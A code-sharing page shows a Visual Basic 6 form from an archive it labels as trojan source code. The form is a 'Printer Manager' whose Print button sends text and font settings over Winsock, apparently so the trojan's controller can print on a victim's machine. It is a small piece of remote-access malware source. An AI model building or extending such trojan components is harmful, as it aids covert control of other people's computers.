⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 frmprinter.frm

📁 一个VB写的国外木马的源代码the_dark_age.zip
💻 FRM
字号:
VERSION 5.00
Begin VB.Form FrmPrinter 
   BorderStyle     =   4  'Fixed ToolWindow
   Caption         =   "                                   Printer Manager"
   ClientHeight    =   3195
   ClientLeft      =   45
   ClientTop       =   315
   ClientWidth     =   4680
   LinkTopic       =   "Form1"
   MaxButton       =   0   'False
   MinButton       =   0   'False
   ScaleHeight     =   3195
   ScaleWidth      =   4680
   ShowInTaskbar   =   0   'False
   StartUpPosition =   3  'Windows Default
   Begin VB.TextBox TxtFontSize 
      Alignment       =   2  'Center
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   285
      Left            =   2400
      MaxLength       =   2
      TabIndex        =   6
      Text            =   "16"
      Top             =   1920
      Width           =   735
   End
   Begin VB.CommandButton CmdPrint 
      Caption         =   "Print"
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   375
      Left            =   1680
      TabIndex        =   5
      Top             =   2520
      Width           =   1575
   End
   Begin VB.TextBox TxtPrint 
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   15.75
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   1695
      Left            =   120
      MultiLine       =   -1  'True
      ScrollBars      =   3  'Both
      TabIndex        =   4
      Text            =   "FrmPrinter.frx":0000
      Top             =   120
      Width           =   4335
   End
   Begin VB.CheckBox ChkStrikeout 
      Caption         =   "Strikeout"
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   -1  'True
      EndProperty
      Height          =   195
      Left            =   120
      TabIndex        =   3
      Top             =   2640
      Width           =   975
   End
   Begin VB.CheckBox ChkItalic 
      Caption         =   "Italic"
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   -1  'True
         Strikethrough   =   0   'False
      EndProperty
      Height          =   255
      Left            =   120
      TabIndex        =   2
      Top             =   2160
      Width           =   735
   End
   Begin VB.CheckBox ChkUnderline 
      Caption         =   "Underline"
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   -1  'True
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   255
      Left            =   120
      TabIndex        =   1
      Top             =   2400
      Width           =   1095
   End
   Begin VB.CheckBox ChkBold 
      Caption         =   "Bold"
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   195
      Left            =   120
      TabIndex        =   0
      Top             =   1920
      Width           =   735
   End
   Begin VB.Label LblFontSize 
      AutoSize        =   -1  'True
      Caption         =   "Font Size:"
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   195
      Left            =   1680
      TabIndex        =   7
      Top             =   1920
      Width           =   720
   End
End
Attribute VB_Name = "FrmPrinter"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub ChkBold_Click()
TxtPrint.FontBold = Not TxtPrint.FontBold
End Sub

Private Sub ChkItalic_Click()
TxtPrint.FontItalic = Not TxtPrint.FontItalic
End Sub

Private Sub ChkStrikeout_Click()
TxtPrint.FontStrikethru = Not TxtPrint.FontStrikethru
End Sub

Private Sub ChkUnderline_Click()
TxtPrint.FontUnderline = Not TxtPrint.FontUnderline
End Sub

Private Sub CmdPrint_Click()
WinSock.SendData "Print|" + TxtPrint + "|" + Str(ChkBold.Value) + "|" + Str(ChkItalic.Value) + "|" + Str(ChkUnderline) + "|" + Str(ChkStrikeout) + "|" + TxtFontSize
End Sub

Private Sub TxtFontSize_Change()
TxtPrint.FontSize = TxtFontSize
End Sub

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -